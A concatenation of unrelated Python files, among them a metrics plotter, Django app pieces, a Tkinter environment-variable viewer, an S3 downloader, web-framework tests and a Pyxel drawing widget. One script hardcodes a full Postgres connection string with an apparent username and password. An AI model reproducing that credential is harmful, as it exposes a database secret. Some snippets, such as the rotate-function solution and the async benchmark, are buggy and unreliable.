self._scalar_data_frame_dict[name] = self._scalar_data_frame_dict[name].append(df, ignore_index=True)
def dist(self, name, step, mean, var, epoch=None):
if epoch is not None:
df = pd.DataFrame({'epoch' : epoch, 'step' : step, name+'_mean' : mean, name+'_var' : var }, index=[0])
else:
df = pd.DataFrame({'step' : step, name+'_mean' : mean, name+'_var' : var, }, index=[0])
if name not in self._dist_data_frame_dict:
self._dist_data_frame_dict[name] = df
else:
self._dist_data_frame_dict[name] = self._dist_data_frame_dict[name].append(df, ignore_index=True)
def dist2(self, name, step, value_list, epoch=None):
mean = np.mean(value_list)
var = np.var(value_list)
self.dist(name, step, mean, var, epoch=epoch)
def to_csv(self, output_dir):
" 将记录保存到多个csv文件里面,csv文件放在output_dir下面。"
if not os.path.exists(output_dir):
os.mkdir(output_dir)
for name, data_frame in self._scalar_data_frame_dict.items():
csv_filepath = os.path.join(output_dir, 'scalar_'+name+'.csv')
data_frame.to_csv(csv_filepath, index=False)
for name, data_frame in self._dist_data_frame_dict.items():
csv_filepath = os.path.join(output_dir, 'dist_'+name+'.csv')
data_frame.to_csv(csv_filepath, index=False)
def from_csv(self, output_dir):
" 从output_dir下面的csv文件里面读取并恢复记录 "
csv_name_list = [fn.split('.')[0] for fn in os.listdir(output_dir) if fn.endswith('csv')]
for name in csv_name_list:
if name.startswith('scalar_'):
in_csv = pd.read_csv(os.path.join(output_dir, name+'.csv'))
self._scalar_data_frame_dict[name[len('scalar_'):]] = in_csv
elif name.startswith('dist_'):
self._dist_data_frame_dict[name[len('dist_'):]] = pd.read_csv(os.path.join(output_dir, name+'.csv'))
def write_svg_all(self, output_dir):
" 将所有记录绘制成svg图片 "
for ind, (name, data_frame) in enumerate(self._scalar_data_frame_dict.items()):
output_svg_filepath = os.path.join(output_dir, name+'.svg')
plt.figure()
plt.clf()
headers = [hd for hd in data_frame.columns if hd not in ['step', 'epoch']]
if len(headers) == 1:
plt.plot(data_frame['step'], data_frame[name])
else:
for hd in headers:
plt.plot(data_frame['step'], data_frame[hd])
plt.legend(headers)
plt.tight_layout()
plt.savefig(output_svg_filepath)
plt.close()
for ind, (name, data_frame) in enumerate(self._dist_data_frame_dict.items()):
output_svg_filepath = os.path.join(output_dir, name+'.svg')
plt.figure()
plt.clf()
plt.errorbar(data_frame['step'], data_frame[name+'_mean'], yerr=data_frame[name+'_var'])
plt.tight_layout()
plt.savefig(output_svg_filepath)
plt.close()
def to_html_report(self, output_filepath):
" 将所有记录整理成一个html报告 "
self.write_svg_all(os.path.dirname(output_filepath))
doc, tag, text = Doc().tagtext()
with open(output_filepath, 'w') as outfile:
with tag('html'):
with tag('body'):
with tag('h3'):
text('1. scalars')
for ind, (name, data_frame) in enumerate(self._scalar_data_frame_dict.items()):
with tag('div', style='display:inline-block'):
with tag('h4', style='margin-left:20px'):
text('(%d). '%(ind+1)+name)
doc.stag("embed", style="width:800px;padding:5px;margin-left:20px", src=name+'.svg', type="image/svg+xml")
with tag('h3'):
text('2. distributions')
for ind, (name, data_frame) in enumerate(self._dist_data_frame_dict.items()):
with tag('div', style='display:inline-block'):
with tag('h4', style='margin-left:20px'):
text('(%d). '%(ind+1)+name)
doc.stag("embed", style="width:800px;padding:5px;margin-left:20px", src=name+'.svg', type="image/svg+xml")
result = indent(doc.getvalue())
outfile.write(result)
class BatchPlotter(object):
def __init__(self):
pass
if __name__ == "__main__":
p = Plotter()
# p.scalar('loss', 1, 100)
# p.scalar('loss', 2, 100)
# p.scalar('loss', 3, 100)
# p.scalar('loss', 4, 100)
# p.scalar('loss', 5, 100)
# p.scalar('loss', 6, 100)
# p.scalar('loss', 7, 100)
# p.scalar('loss', 8, 100)
# p.scalar('loss', 9, 100)
# p.scalar('loss', 10, 100)
# p.scalar('loss', 11, 100)
# p.scalar('loss', 12, 100)
# p.scalar('loss2', 1, 100)
# p.scalar('loss2', 2, 100)
# p.scalar('loss2', 3, 100)
# p.scalar('loss2', 4, 100)
# p.scalar('loss2', 5, 100)
# p.scalar('loss2', 6, 100)
# p.scalar('loss2', 7, 100)
# p.scalar('loss2', 8, 100)
# p.scalar('loss2', 9, 100)
# p.scalar('loss2', 10, 100)
# p.scalar('loss2', 11, 100)
# p.scalar('loss2', 12, 100)
# p.dist('loss3', 1, 100.0/1.0, 10)
# p.dist('loss3', 2, 100.0/2.0, 10)
# p.dist('loss3', 3, 100.0/3.0, 10)
# p.dist('loss3', 4, 100.0/4.0, 10)
# p.dist('loss3', 5, 100.0/5.0, 10)
# p.dist('loss3', 6, 100.0/6.0, 10)
# p.dist('loss3', 7, 100.0/7.0, 10)
# p.dist('loss3', 8, 100.0/8.0, 10)
# p.dist('loss3', 9, 100.0/9.0, 10)
# p.dist('loss3', 10, 100.0/10.0, 10)
# p.dist('loss3', 11, 100.0/11.0, 10)
# p.dist('loss3', 12, 100.0/12.0, 10)
p.from_csv('./experiments/main/a/plot_output')
# print(p._scalar_data_frame_dict.headers)
p.to_html_report('./experiments/main/a/plot_output/output.html')
# p.to_csv('./test_csv_output2')
|
from datetime import datetime
from ..names import make_name
def test_make_name():
# str (some with invalid/unwanted chars)
assert make_name('backup name') == 'backup_name'
assert make_name('backup/name') == 'backup!name'
assert make_name('backup::name') == 'backup:name'
# int
assert make_name(1, 2, 3) == '1-2-3'
# datetime
ts = datetime(1999, 12, 31, 23, 59, 59)
assert make_name(ts) == '1999-12-31T23:59:59'
# edge case
assert make_name() == ''
# bytes and safe decoding
assert make_name(b'bytestring') == 'bytestring'
s = 'äöü'
b_utf8 = s.encode('utf-8')
b_iso = s.encode('iso-8859-1')
assert make_name(b_utf8) == s
assert make_name(b_iso) # shall not raise, surrogateescaped
# mixed
assert make_name(s, b_utf8, 1) == 'äöü-äöü-1'
|
team_1 = """
Hippowdon @ Smooth Rock
Ability: Sand Stream
EVs: 252 HP / 4 Atk / 252 Def
Impish Nature
- Stealth Rock
- Earthquake
- Whirlwind
- Slack Off
Dracozolt @ Life Orb
Ability: Sand Rush
EVs: 252 Atk / 4 SpD / 252 Spe
Adamant Nature
- Bolt Beak
- Fire Fang
- Stone Edge
- Outrage
Zapdos-Galar @ Choice Scarf
Ability: Defiant
EVs: 252 Atk / 4 SpD / 252 Spe
Jolly Nature
- Thunderous Kick
- U-turn
- Brave Bird
- Blaze Kick
Ferrothorn @ Leftovers
Ability: Iron Barbs
Shiny: Yes
EVs: 252 HP / 252 Def / 4 SpD
Impish Nature
- Spikes
- Knock Off
- Body Press
- Leech Seed
Tyranitar @ Choice Band
Ability: Sand Stream
EVs: 252 Atk / 4 SpD / 252 Spe
Adamant Nature
- Stone Edge
- Crunch
- Heavy Slam
- Fire Punch
Tapu Fini @ Leftovers
Ability: Misty Surge
EVs: 248 HP / 16 Def / 12 SpA / 40 SpD / 192 Spe
Calm Nature
- Defog
- Moonblast
- Scald
- Taunt
"""
|
"""Chapter 2: Values and Variables
Numeric values
Strings
Variables
Assignment
Identifiers
Reserved words
To delete some variable:
del variable1, variable2, ...
"""
"2.1 Integer and String Values"
# Ex: 4 = integer number
3+4 # Normal arithmetic addition
# 2,468 would appear as 2468, or without the comma
# String = a sequence of characters
# Delimited by single or double quotes ('', "")
# Ex:
"Hello"
# Interpreters always output a string in single quotes
# What if you're missing a matching quotation mark?
"Hello # You'll get an error here
"2.2 Variables and Assignment"
# Assignment statement:
# associates a value with a variable
# = is called the assignment operator
# you can change the value of a same variable later on
x = 10 # Assign the numeric value of 10 to the variable x
print(x)
# You can assign multiple variables in one statement using a tuple assignment
x, y, z = 1, 2, 3
# A tuple is a comma-separated list of expressions
# Only works if both sides contain the same number of elements
x, y = 1, 2, 3
"2.3 Identifiers"
# Identifier = a word used to name things
# Rules:
# Must contain at least one character
# No spaces allowed
# Reserved words are not allowed
# Cannot begin with an integer
"2.4 Floating-point Numbers"
# Floating-point number = non-integers, with decimals
float(123/3)
# Does not allow for infinite decimal places, like pi (3.14)
round(123.334, 2)
"2.5 Control Codes within Strings"
# Special characters within strings that do something
# Denoted by "\", a backslash
# Control Codes:
# \n = newline
# \t = new tab
# \b = backspace
# \\ = backslash
# Examples:
print("Hello \nWorld")
print("Hello \tWorld")
print("Hello \bWorld")
print("Hello \\World")
"2.8 String Formatting"
# print(f"{})
# thing inside brackets is called the positional parameter
# Example:
name = "Matthias"
age = 22
print(f"Hello {name}")
print("Hello {}".format(name))
print("Hello {} who is {}".format(name, age))
"2.9 Multi-line Strings"
# Denoted by the triple string ''', or, """
# Example
"""Hello
How are you today"""
# is the same thing as:
print("Hello \nHow are you today")
"Exercises"
8.
# Yes, you can assign more than one variable in a single statement with a tuple
17.
print("A\nB\nC\nD\nE\nF") |
import csv
import os
from uuid import uuid4
import psycopg2
from psycopg2 import extras
#connect to Database
db_string = "postgres://rfiyeehknxkzti:fcd541969aee3f6c579001a4769f90bb3d27c6e5194c31478217c5010e016a22@ec2-54-227-243-210.compute-1.amazonaws.com:5432/d4dhnjm6dcg7mm"
os.environ["DATABASE_URL"] = db_string
conn = psycopg2.connect(db_string)
cur = conn.cursor()
#Pull CSV into Context
zipListFile = open("zips.csv")
reader = csv.reader(zipListFile)
firstline = True
for ZipCode, City, State, Lat, Long, Population in reader:
if firstline:
firstline = False
continue
GUID = uuid4()
psycopg2.extras.register_uuid()
Lat = float(Lat)
Long = float(Long)
cur.execute("INSERT INTO location VALUES (%s, %s, %s, %s, %s, %s, %s)", ( GUID, ZipCode, City, State, Lat, Long, Population ))
conn.commit() |
from django.urls import path
from . import views
app_name = "task"
urlpatterns = [
path("new_task/", views.new_task, name="new_task"),
path("task_manager/", views.task_manager, name="task_manager"),
path("edit_task/", views.edit_task, name="edit_task"),
path("delete_task/", views.delete_task),
path(
"set_task_extend_state/",
views.set_task_extend_state,
name="set_task_extend_state",
),
path("subtask_manager/", views.subtask_manager),
path("status_manager/", views.status_manager),
]
|
#!/usr/bin/env python
# coding: utf-8
# In[ ]:
# Depth First Search : Algorithm for MRO
class X: pass
class Y: pass
class Z: pass
class A(X,Y): pass
class B(Y,Z): pass
class M(B,A,Z): pass
print(M.__mro__)
|
import scrapy
class LineItem(scrapy.Item):
name = scrapy.Field()
situation = scrapy.Field()
description = scrapy.Field() |
import subprocess as sp
import tkinter as tk
from tkinter import ttk
topRow = 0
WHITE_COLOR = "#ffffff"
def on_mousewheel(event):
if event.num == 5 or event.delta == -120:
canvas.yview_scroll(1, "units")
if event.num == 4 or event.delta == 120:
canvas.yview_scroll(-1, "units")
class KeyLabel(tk.Label):
def __init__(self, key, row, master=None, *cnf, **kw):
super(KeyLabel, self).__init__(master=master, *cnf, **kw)
self.key = key
self.row = row
self.backGroundColor = "#c4e8f2"
self.bind("<Button-1>", self.renderValues)
def renderValues(self, event):
[row.configure(background=WHITE_COLOR)
for row in scrollable_frame.grid_slaves(column=0)]
self.configure(background=self.backGroundColor)
[row.configure(text="", bg=WHITE_COLOR)
for row in scrollable_frame.grid_slaves(column=1)]
for e, i in enumerate(var_dict[self.key]):
tk.Label(scrollable_frame, text=i, bg=WHITE_COLOR).grid(
column=1, row=self.row+e)
print(i)
# list of all system variables
cmd = ["env"]
proc = sp.Popen(cmd, stdout=sp.PIPE, stderr=sp.PIPE)
o, e = proc.communicate()
variables = str.split(str(o), "\\n")
var_dict = {}
for variable in variables:
# get variable
var = str.split(variable, "=")
# get values
if (len(var) < 2):
continue
val = str.split(var[1], ":")
var_dict[var[0]] = val
print(var_dict['PATH'])
# GUI
root = tk.Tk()
root.title("System variables manager")
root.grid()
container = tk.Frame(root)
container.configure(width=500)
canvas = tk.Canvas(container, bg=WHITE_COLOR)
scrollbar = tk.Scrollbar(container, orient="vertical", command=canvas.yview)
scrollable_frame = tk.Frame(canvas, bg=WHITE_COLOR)
scrollable_frame.grid(sticky="NSWE")
scrollable_frame.bind(
"<Configure>",
lambda e: canvas.configure(
scrollregion=canvas.bbox("all")
)
)
canvas.create_window((0, 0), window=scrollable_frame,
anchor="nw")
canvas.configure(yscrollcommand=scrollbar.set, width=1000)
root.bind("<Button-4>", on_mousewheel)
root.bind("<Button-5>", on_mousewheel)
for e, i in enumerate(var_dict.keys()):
label = KeyLabel(i, e, scrollable_frame, text=i, bg=WHITE_COLOR)
label.grid(row=e, column=0)
container.grid(sticky="NSWE")
canvas.grid(sticky="NSWE")
# Buttons
buttonFrame = tk.Frame(container)
buttonFrame.grid(row=0, column=1)
add = tk.Button(buttonFrame, text="Add")
add.grid(row=0, sticky="N")
remove = tk.Button(buttonFrame, text="Remove")
remove.grid(row=1, sticky="N")
browse = tk.Button(buttonFrame, text="Browse")
browse.grid(row=2, sticky="N")
scrollbar.grid(row=0, column=2, sticky="NSW")
root.mainloop()
|
class Solution(object):
def maxRotateFunction(self, A):
"""
:type A: List[int]
:rtype: int
"""
n = len(A)
m=[]
for i in range(len(A)):
a,b = 0,0
for j in range(0-i,0-i+4):
a += A[j] * b
b += 1
b = 0
m.append(a)
return max(m)
if __name__ == '__main__':
A = [4, 3, 2, 6]
print(Solution().maxRotateFunction(A))
|
import boto3
import os
s3 = boto3.resource("s3")
def download_s3_folder(bucket_name, s3_folder, local_dir=None):
"""
Download the contents of a folder directory
Args:
bucket_name: the name of the s3 bucket
s3_folder: the folder path in the s3 bucket
local_dir: a relative or absolute directory path in the local file system
"""
bucket = s3.Bucket(bucket_name)
for obj in bucket.objects.filter(Prefix=s3_folder):
target = (
obj.key
if local_dir is None
else os.path.join(local_dir, os.path.relpath(obj.key, s3_folder))
)
if not os.path.exists(os.path.dirname(target)):
os.makedirs(os.path.dirname(target))
if obj.key[-1] == "/":
continue
bucket.download_file(obj.key, target)
# download_s3_folder("dataops-docs-trybe-us-east-2-679152", "saga/")
download_s3_folder("dataops-docs-trybe-us-east-2-679152", "aiolia/")
|
from vibora.tests import TestSuite
from vibora.blueprints import Blueprint, Response
from vibora.router import RouterStrategy
from vibora import Vibora
class BlueprintsTestCase(TestSuite):
def setUp(self):
self.app = Vibora(router_strategy=RouterStrategy.STRICT)
async def test_simple_add_blueprint__expects_added(self):
b1 = Blueprint()
@b1.route('/')
async def home():
return Response(b'123')
self.app.add_blueprint(b1)
with self.app.test_client() as client:
response = await client.request('/')
self.assertEqual(response.content, b'123')
async def test_simple_add_blueprint_with_prefix_expects_added(self):
b1 = Blueprint()
@b1.route('/')
async def home():
return Response(b'123')
self.app.add_blueprint(b1, prefixes={'home': '/home'})
with self.app.test_client() as client:
response = await client.request('/home/')
self.assertEqual(response.content, b'123')
async def test_simple_add_nested_blueprints(self):
b1 = Blueprint()
b2 = Blueprint()
@b2.route('/123')
async def home():
return Response(b'123')
b1.add_blueprint(b2)
self.app.add_blueprint(b1)
with self.app.test_client() as client:
response = await client.request('/123')
self.assertEqual(response.content, b'123')
async def test_simple_add_nested_blueprints_with_prefixes(self):
b1 = Blueprint()
b2 = Blueprint()
@b2.route('/123')
async def home():
return Response(b'123')
b1.add_blueprint(b2, prefixes={'a': '/a', 'b': '/b'})
self.app.add_blueprint(b1, prefixes={'a': '/a', 'b': '/b'})
with self.app.test_client() as client:
response = await client.request('/a/a/123')
self.assertEqual(response.content, b'123')
response = await self.app.test_client().request('/b/b/123')
self.assertEqual(response.content, b'123')
# def test_routes_added_to_router_with_non_empty_pattern(self):
# b1 = Blueprint()
# new_route = Route('/', lambda: 'Hello', methods=['GET'])
# b1.add_route(new_route)
# v = Vibora(router_strategy=RouteStrategy.STRICT)
# prefixes = {'': '/v1'}
# v.add_blueprint(b1, prefixes=prefixes)
# for route in v.router.routes['GET']:
# if route.pattern == '/v1/':
# return
# self.fail('Failed to find Route.')
#
# def test_nested_blueprints_expects_correct_pattern(self):
# b1 = Blueprint()
# b2 = Blueprint()
# b1.add_blueprint(b2, prefixes={'b2': '/b2'})
# new_route = Route('/', lambda: 'Hello', methods=['GET'], name='hello')
# b2.add_route(new_route)
# v = Vibora(router_strategy=RouteStrategy.STRICT)
# v.add_blueprint(b1, prefixes={'': ''})
# for route in v.router.routes['GET']:
# if route.pattern == '/b2/':
# return
# self.fail('Failed to find Route.')
#
# def test_three_nested_blueprints_expects_correct_pattern(self):
# b1 = Blueprint()
# b2 = Blueprint()
# b3 = Blueprint()
# b1.add_blueprint(b2, prefixes={'b2': '/b2'})
# b2.add_blueprint(b3, prefixes={'b3': '/b3'})
# new_route = Route('/', lambda: 'Hello', methods=['GET'])
# b3.add_route(new_route)
# v = Vibora(router_strategy=RouteStrategy.STRICT)
# v.add_blueprint(b1, prefixes={'': '/b1'})
# for route in v.router.routes['GET']:
# if route.pattern == '/b1/b2/b3/':
# return
# self.fail('Failed to find Route.')
#
# def test_reverse_index_nested_blueprints(self):
# b1 = Blueprint()
# b2 = Blueprint()
# b3 = Blueprint()
# b1.add_blueprint(b2, prefixes={'b2': '/b2'})
# b2.add_blueprint(b3, prefixes={'b3': '/b3'})
# new_route = Route('/', lambda: 'Hello', methods=['GET'], name='hello')
# b3.add_route(new_route)
# v = Vibora(router_strategy=RouteStrategy.STRICT)
# v.add_blueprint(b1, prefixes={'': '/b1'})
# self.assertTrue(
# 'b2:b3.hello' in v.router.reverse_index
# )
#
# def test_reverse_index_nested_blueprints_non_empty(self):
# b1 = Blueprint()
# b2 = Blueprint()
# b3 = Blueprint()
# b1.add_blueprint(b2, prefixes={'b2': '/b2'})
# b2.add_blueprint(b3, prefixes={'b3': '/b3'})
# new_route = Route('/', lambda: 'Hello', methods=['GET'], name='hello')
# b3.add_route(new_route)
# v = Vibora(router_strategy=RouteStrategy.STRICT)
# v.add_blueprint(b1, prefixes={'b1': '/b1'})
# self.assertTrue(
# 'b1:b2:b3.hello' in v.router.reverse_index
# )
|
from django.db import models
from django.contrib.auth.models import Permission, User
class Vare(models.Model):
user = models.ForeignKey(User, default=1)
navn = models.CharField(max_length=250)
pris = models.CharField(max_length=20)
alkohol = models.CharField(max_length=10)
volum = models.CharField(max_length=10)
kalkulering = models.CharField(max_length=20)
def __str__(self):
return self.navn + ' - '
class Top(models.Model):
navn = models.CharField(max_length=250)
pris = models.CharField(max_length=20)
alkohol = models.CharField(max_length=10)
volum = models.CharField(max_length=10)
kalkulering = models.CharField(max_length=20)
def __str__(self):
return self.navn + ' - ' |
import itertools
import collections
import asyncio
import mmap
import benchmarking
class benchAsync( benchmarking.BenchFixture ):
def __init__( self ):
self.f = ""
self.deq = None
self.window_size = 2
self.setUp( )
def setUp( self ):
f = open('profiling/SampleData/large_file.txt', 'r+b')
self.f = mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ)
self.deq = collections.deque( )
def tearDown( ):
pass
async def tokenizeAsync( s ):
tokens = s.split( )
await skipgramAsync( tokens )
async def bigramAsync( sep ):
bigs = [ ]
for k,v in enumerate(sep):
if k == len(sep) - 1:
break
else:
bigs.append((v,sep[k+1]))
await countAsync( bigs )
async def skipgramAsync( tokens ):
its = itertools.tee(tokens, 2) # so xs is an iterable, such that it can return an iterator
for i, iterator in enumerate(its):
for _ in range(i):
next(iterator)
for block in zip(*its):
await flatMapAsync( block )
async def flatMapAsync( blocks ):
grams = flat( blocks )
await countAsync( blocks )
async def countAsync1( lst ):
c = collections.Counter(lst)
print(c)
return c
async def mmapAsync( self ): #, q, overall ):
buffer_size = 100000
while True:
buf = self.f.read(buffer_size)
if not buf:
break
# # if you read part way into a word, read some more until you hit a space
# if buf[-1] != 32:
# extra = b""
# while True:
# extra_byte = mmap_file.read(1)
# if extra_byte:
# if extra_byte[0] != 32:
# extra = extra + extra_byte
# else:
# buf = buf + extra + extra_byte
# break
# else:
# break
async def tokenizeAsync2( self, s ):
tokens = s.split( )
await pushOnQAsync( tokens )
async def pushOnQAsync( self, t ):
for i in t:
q.append(i)
await skipgramAsync( )
async def skipgramAsync2( self ):
while True:
if len(q) > 2:
await countAsync( (q[0], q[2]) )
else:
break
async def countAsync2( self, tup ):
q.popleft( )
return overall
async def mainAsync( self ):
await mmapAsync( )
def runPipe( self, outfile ):
loop = asyncio.get_event_loop( )
result = loop.run_until_complete(self.mmapAsync( ) )
if __name__ == "__main__":
benchmarking.Benchmark( )
|
# Generated by Django 3.0.2 on 2020-12-02 03:50
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('statemachine', '0003_auto_20201126_1306'),
]
operations = [
migrations.CreateModel(
name='UserState',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('user_id', models.PositiveIntegerField()),
('workflow_id', models.PositiveIntegerField()),
('state', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='statemachine.State')),
],
),
]
|
from django.http import HttpResponse
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "realEstateAdvisor.settings")
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
def index(request):
return HttpResponse("Hello, world. You're at the polls index.") |
import pyxel
from pyxel.ui import ScrollBar, Widget
from pyxel.ui.constants import WIDGET_HOLD_TIME, WIDGET_REPEAT_TIME
from .constants import (
TOOL_BUCKET,
TOOL_CIRC,
TOOL_CIRCB,
TOOL_PENCIL,
TOOL_RECT,
TOOL_RECTB,
TOOL_SELECT,
)
from .overlay_canvas import OverlayCanvas
class DrawingPanel(Widget):
def __init__(self, parent, *, is_tilemap_mode):
super().__init__(parent, 11, 16, 130, 130)
self._is_tilemap_mode = is_tilemap_mode
self._history_data = None
self.viewport_x = 0
self.viewport_y = 0
self._press_x = 0
self._press_y = 0
self._last_x = 0
self._last_y = 0
self._drag_offset_x = 0
self._drag_offset_y = 0
self._select_x1 = 0
self._select_y1 = 0
self._select_x2 = 0
self._select_y2 = 0
self._copy_buffer = None
self._is_dragged = False
self._is_assist_mode = False
self._overlay_canvas = OverlayCanvas()
self._h_scroll_bar = ScrollBar(
self, 11, 145, 130, ScrollBar.HORIZONTAL, 32, 2, 0
)
self._v_scroll_bar = ScrollBar(self, 140, 16, 130, ScrollBar.VERTICAL, 32, 2, 0)
self.add_event_handler("mouse_down", self.__on_mouse_down)
self.add_event_handler("mouse_up", self.__on_mouse_up)
self.add_event_handler("mouse_click", self.__on_mouse_click)
self.add_event_handler("mouse_drag", self.__on_mouse_drag)
self.add_event_handler("mouse_hover", self.__on_mouse_hover)
self.add_event_handler("update", self.__on_update)
self.add_event_handler("draw", self.__on_draw)
self._h_scroll_bar.add_event_handler("change", self.__on_h_scroll_bar_change)
self._v_scroll_bar.add_event_handler("change", self.__on_v_scroll_bar_change)
def _add_pre_history(self, canvas):
self._history_data = data = {}
if self._is_tilemap_mode:
data["tilemap"] = self.parent.tilemap
else:
data["image"] = self.parent.image
data["pos"] = (self.viewport_x, self.viewport_y)
data["before"] = canvas.copy()
def _add_post_history(self, canvas):
data = self._history_data
data["after"] = canvas.copy()
if (data["before"] != data["after"]).any():
self.parent.add_history(data)
def _screen_to_view(self, x, y):
x = min(max((x - self.x - 1) // 8, 0), 15)
y = min(max((y - self.y - 1) // 8, 0), 15)
return x, y
def __on_mouse_down(self, key, x, y):
if key != pyxel.MOUSE_LEFT_BUTTON:
return
x, y = self._screen_to_view(x, y)
self._press_x = x
self._press_y = y
self._is_dragged = True
self._is_assist_mode = False
if self.parent.tool == TOOL_SELECT:
self._select_x1 = self._select_x2 = x
self._select_y1 = self._select_y2 = y
elif self.parent.tool == TOOL_PENCIL:
self._overlay_canvas.pix(x, y, self.parent.color)
elif TOOL_RECTB <= self.parent.tool <= TOOL_CIRC:
self._overlay_canvas.rect(x, y, x, y, self.parent.color, False)
elif self.parent.tool == TOOL_BUCKET:
data = (
pyxel.tilemap(self.parent.tilemap).data
if self._is_tilemap_mode
else pyxel.image(self.parent.image).data
)
dest = data[
self.viewport_y : self.viewport_y + 16,
self.viewport_x : self.viewport_x + 16,
]
self._add_pre_history(dest)
self._overlay_canvas.fill(x, y, self.parent.color, dest)
self._add_post_history(dest)
self._last_x = x
self._last_y = y
def __on_mouse_up(self, key, x, y):
if key != pyxel.MOUSE_LEFT_BUTTON:
return
self._is_dragged = False
if TOOL_PENCIL <= self.parent.tool <= TOOL_CIRC:
data = (
pyxel.tilemap(self.parent.tilemap).data
if self._is_tilemap_mode
else pyxel.image(self.parent.image).data
)
dest = data[
self.viewport_y : self.viewport_y + 16,
self.viewport_x : self.viewport_x + 16,
]
self._add_pre_history(dest)
index = self._overlay_canvas.data != OverlayCanvas.COLOR_NONE
dest[index] = self._overlay_canvas.data[index]
self._overlay_canvas.clear()
self._add_post_history(dest)
def __on_mouse_click(self, key, x, y):
if key == pyxel.MOUSE_RIGHT_BUTTON:
x = self.viewport_x + (x - self.x) // 8
y = self.viewport_y + (y - self.y) // 8
if self._is_tilemap_mode:
self.parent.color = pyxel.tilemap(self.parent.tilemap).data[y, x]
else:
self.parent.color = pyxel.image(self.parent.image).data[y, x]
def __on_mouse_drag(self, key, x, y, dx, dy):
if key == pyxel.MOUSE_LEFT_BUTTON:
x1 = self._press_x
y1 = self._press_y
x2 = (x - self.x - 1) // 8
y2 = (y - self.y - 1) // 8
if self.parent.tool == TOOL_SELECT:
x2 = min(max(x2, 0), 15)
y2 = min(max(y2, 0), 15)
self._select_x1, self._select_x2 = (x1, x2) if x1 < x2 else (x2, x1)
self._select_y1, self._select_y2 = (y1, y2) if y1 < y2 else (y2, y1)
elif self.parent.tool == TOOL_PENCIL:
if self._is_assist_mode:
self._overlay_canvas.clear()
self._overlay_canvas.line(x1, y1, x2, y2, self.parent.color)
else:
self._overlay_canvas.line(
self._last_x, self._last_y, x2, y2, self.parent.color
)
elif self.parent.tool == TOOL_RECTB:
self._overlay_canvas.clear()
self._overlay_canvas.rectb(
x1, y1, x2, y2, self.parent.color, self._is_assist_mode
)
elif self.parent.tool == TOOL_RECT:
self._overlay_canvas.clear()
self._overlay_canvas.rect(
x1, y1, x2, y2, self.parent.color, self._is_assist_mode
)
elif self.parent.tool == TOOL_CIRCB:
self._overlay_canvas.clear()
self._overlay_canvas.circb(
x1, y1, x2, y2, self.parent.color, self._is_assist_mode
)
elif self.parent.tool == TOOL_CIRC:
self._overlay_canvas.clear()
self._overlay_canvas.circ(
x1, y1, x2, y2, self.parent.color, self._is_assist_mode
)
self._last_x = x2
self._last_y = y2
elif key == pyxel.MOUSE_RIGHT_BUTTON:
self._drag_offset_x -= dx
self._drag_offset_y -= dy
if abs(self._drag_offset_x) >= 16:
offset = self._drag_offset_x // 16
self.viewport_x += offset * 8
self._drag_offset_x -= offset * 16
if abs(self._drag_offset_y) >= 16:
offset = self._drag_offset_y // 16
self.viewport_y += offset * 8
self._drag_offset_y -= offset * 16
self.viewport_x = min(max(self.viewport_x, 0), 240)
self.viewport_y = min(max(self.viewport_y, 0), 240)
def __on_mouse_hover(self, x, y):
if self.parent.tool == TOOL_SELECT:
s = "COPY:CTRL+C PASTE:CTRL+V"
elif self._is_dragged:
s = "ASSIST:SHIFT"
else:
s = "PICK:R-CLICK VIEW:R-DRAG"
x, y = self._screen_to_view(x, y)
x += self.viewport_x
y += self.viewport_y
self.parent.help_message = s + " ({},{})".format(x, y)
def __on_update(self):
if self._is_dragged and not self._is_assist_mode and pyxel.btn(pyxel.KEY_SHIFT):
self._is_assist_mode = True
x1 = self._press_x
y1 = self._press_y
x2 = self._last_x
y2 = self._last_y
if self.parent.tool == TOOL_PENCIL:
self._overlay_canvas.clear()
self._overlay_canvas.line(x1, y1, x2, y2, self.parent.color)
elif self.parent.tool == TOOL_RECTB:
self._overlay_canvas.clear()
self._overlay_canvas.rectb(x1, y1, x2, y2, self.parent.color, True)
elif self.parent.tool == TOOL_RECT:
self._overlay_canvas.clear()
self._overlay_canvas.rect(x1, y1, x2, y2, self.parent.color, True)
elif self.parent.tool == TOOL_CIRCB:
self._overlay_canvas.clear()
self._overlay_canvas.circb(x1, y1, x2, y2, self.parent.color, True)
elif self.parent.tool == TOOL_CIRC:
self._overlay_canvas.clear()
self._overlay_canvas.circ(x1, y1, x2, y2, self.parent.color, True)
if (
self.parent.tool == TOOL_SELECT
and self._select_x1 >= 0
and pyxel.btn(pyxel.KEY_CONTROL)
):
if pyxel.btnp(pyxel.KEY_C):
if self._is_tilemap_mode:
data = pyxel.tilemap(self.parent.tilemap).data
else:
data = pyxel.image(self.parent.image).data
src = data[
self.viewport_y
+ self._select_y1 : self.viewport_y
+ self._select_y2
+ 1,
self.viewport_x
+ self._select_x1 : self.viewport_x
+ self._select_x2
+ 1,
]
self._copy_buffer = src.copy()
elif self._copy_buffer is not None and pyxel.btnp(pyxel.KEY_V):
x1 = self.viewport_x + self._select_x1
y1 = self.viewport_y + self._select_y1
height, width = self._copy_buffer.shape
width -= max(self._select_x1 + width - 16, 0)
height -= max(self._select_y1 + height - 16, 0)
if self._is_tilemap_mode:
data = pyxel.tilemap(self.parent.tilemap).data
else:
data = pyxel.image(self.parent.image).data
dest = data[y1 : y1 + height, x1 : x1 + width]
dest[:, :] = self._copy_buffer[:height, :width]
if (
pyxel.btn(pyxel.KEY_SHIFT)
or pyxel.btn(pyxel.KEY_CONTROL)
or pyxel.btn(pyxel.KEY_ALT)
):
return
if pyxel.btnp(pyxel.KEY_LEFT, WIDGET_HOLD_TIME, WIDGET_REPEAT_TIME):
self.viewport_x -= 8
if pyxel.btnp(pyxel.KEY_RIGHT, WIDGET_HOLD_TIME, WIDGET_REPEAT_TIME):
self.viewport_x += 8
if pyxel.btnp(pyxel.KEY_UP, WIDGET_HOLD_TIME, WIDGET_REPEAT_TIME):
self.viewport_y -= 8
if pyxel.btnp(pyxel.KEY_DOWN, WIDGET_HOLD_TIME, WIDGET_REPEAT_TIME):
self.viewport_y += 8
self.viewport_x = min(max(self.viewport_x, 0), 240)
self.viewport_y = min(max(self.viewport_y, 0), 240)
self._h_scroll_bar.value = self.viewport_x // 8
self._v_scroll_bar.value = self.viewport_y // 8
def __on_draw(self):
